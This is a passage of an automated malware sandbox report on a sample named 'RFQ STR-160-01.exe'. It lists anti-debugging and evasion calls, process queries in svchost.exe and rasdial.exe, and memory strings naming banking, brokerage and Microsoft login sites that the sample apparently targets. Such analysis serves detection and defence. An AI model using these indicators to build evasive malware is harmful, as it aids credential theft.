            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_00605C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00605C97
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0307C420 FindFirstFileW,FindNextFileW,FindClose,7_2_0307C420
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005942DE
            Source: A7b2-53.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: A7b2-53.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: A7b2-53.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: A7b2-53.7.drBinary or memory string: discord.comVMware20,11696487552f
            Source: A7b2-53.7.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: A7b2-53.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: A7b2-53.7.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: A7b2-53.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: A7b2-53.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: A7b2-53.7.drBinary or memory string: global block list test formVMware20,11696487552
            Source: A7b2-53.7.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: A7b2-53.7.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.3990286290.0000000000807000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3990288886.0000000003329000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: A7b2-53.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: A7b2-53.7.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: A7b2-53.7.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: A7b2-53.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: A7b2-53.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: A7b2-53.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: A7b2-53.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: A7b2-53.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: A7b2-53.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: A7b2-53.7.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: A7b2-53.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: A7b2-53.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: A7b2-53.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: A7b2-53.7.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: A7b2-53.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: A7b2-53.7.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: A7b2-53.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: A7b2-53.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: A7b2-53.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: firefox.exe, 00000009.00000002.2774467322.0000025A4EC1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBB
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004174F3 LdrLoadDll,2_2_004174F3
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_0060EAA2 BlockInput,0_2_0060EAA2
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005C2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005C2622
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005942DE
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005B4CE8 mov eax, dword ptr fs:[00000030h]0_2_005B4CE8
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_017934F0 mov eax, dword ptr fs:[00000030h]0_2_017934F0
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_01793490 mov eax, dword ptr fs:[00000030h]0_2_01793490
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_01791E70 mov eax, dword ptr fs:[00000030h]0_2_01791E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h]2_2_039EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h]2_2_039B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039663FF mov eax, dword ptr fs:[00000030h]2_2_039663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h]2_2_0392C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov ecx, dword ptr fs:[00000030h]2_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h]2_2_03950310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h]2_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h]2_2_039D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D437C mov eax, dword ptr fs:[00000030h]2_2_039D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0634F mov eax, dword ptr fs:[00000030h]2_2_03A0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A062D6 mov eax, dword ptr fs:[00000030h]2_2_03A062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392823B mov eax, dword ptr fs:[00000030h]2_2_0392823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h]2_2_0392A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936259 mov eax, dword ptr fs:[00000030h]2_2_03936259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h]2_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h]2_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392826B mov eax, dword ptr fs:[00000030h]2_2_0392826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0625D mov eax, dword ptr fs:[00000030h]2_2_03A0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03970185 mov eax, dword ptr fs:[00000030h]2_2_03970185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]2_2_03A061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]2_2_039601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]2_2_039F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]2_2_03960124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]2_2_0392C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]2_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]2_2_0393208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]2_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]2_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039280A0 mov eax, dword ptr fs:[00000030h]2_2_039280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]2_2_039C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]2_2_039B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]2_2_0392C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]2_2_039720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0392A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]2_2_039380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]2_2_039B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]2_2_039B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
